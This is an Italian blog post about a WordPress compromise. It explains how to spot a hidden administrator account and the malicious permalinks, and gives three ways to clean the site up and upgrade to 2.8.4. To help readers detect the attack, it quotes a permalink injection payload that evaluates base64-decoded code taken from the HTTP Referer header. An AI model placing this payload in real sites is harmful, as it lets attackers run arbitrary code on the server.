Vulnerabilità su Wordpress

09
settembre
Invincibile22

Questa sera mi capita di leggere una mail dell’azienda che mi offre il servizio di hosting e che mi informa di una falla di sicurezza di Wordpress. La cosa mi colpisce subito, anche perchè in questi giorni ho riscontrato la registrazione di strani utenti con indirizzi mail particolari che nemmeno interagivano con l’attività del blog.  Mi trovo quindi, tra gli utenti, un account nascosto con privilegi di amministratore  ( per accorgersi basta entrare nel pannello di controllo, andare su utenti e vedere se accanto alla scritta amministratore appare un 2). Il mio sito è già bello che bucato!! :(

Come fare per risolvere? scrivo qui due righe sperando che possano essere utili a chiunque si trovasse in questa situazione.

Come accorgersi se il sito è stato vittima di un attacco?

- Verificare la pesenza di un account nascosto con privilegi di amministratore ( come deto prima)

- Verificare in Impostazioni e poi Permalink che non vi siano stringhe di codice strane del tipo “http://www.sito.com/2009/09/05/titolo-post/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%

Cosa fare?

Per risolvere il problema a mio avviso ci sono tre soluzioni:

- La più drastica : cancellate tutto, svuotate il database e caricate il nuovo Wordpress vers. 2.8.4. Ovviamente se in precedenza  avete fatto un backup del database  quando ancora era” non infetto”. Fare backup ora potrebbe (anzi quasi sicuramente o lo è)  essere inutile.

- La più semplice: se ne avete la possibilità, utlizzate il “potente” phpmyadmin e cancellate direttamente dal database, tabella wp-user e wp-option,   l’utente maligno e gli eventuali permalink fasulli.

- La più semplice e a prova di danni: scovate manualmente l’utente nascosto, cancellatelo o riducetelo ad un semplice sottoscrittore. Vi invito a seguire la spiegazione di Vincenzo, in arte Wilky, direttamente dal suo blog che è molto interessante. Clicca qui.

Note:

prima dell’attacco mi sono trovato la registrazione di questi due account:

  1. Andrianq : pulvillarrac (chiocciola) gmail.com
  2. MikeWink : bugbeemershonyhe (chiocciola) gmail.com.

Si tratta di BOT che cercano in rete versioni di WP inferiori alla 2.8.4, quindi se vi accorgete subito dell’intrusione è probabile che nessuno abbia ancora utilizzato veramente il votro blog per i suoi scopi. Importante è risolvere subito e aggiornare alla nuova versione 2.8.4.

Categoria: Miscellaneous, Notizie dal Mondo  Tags: , , , ,
Puoi seguire tutte le risposte di questo articolo attraverso le RSS 2.0 feed. Tutti i commenti sono chiusi.

Per scelta dell'amministratore i commenti sono chiusi .

«
»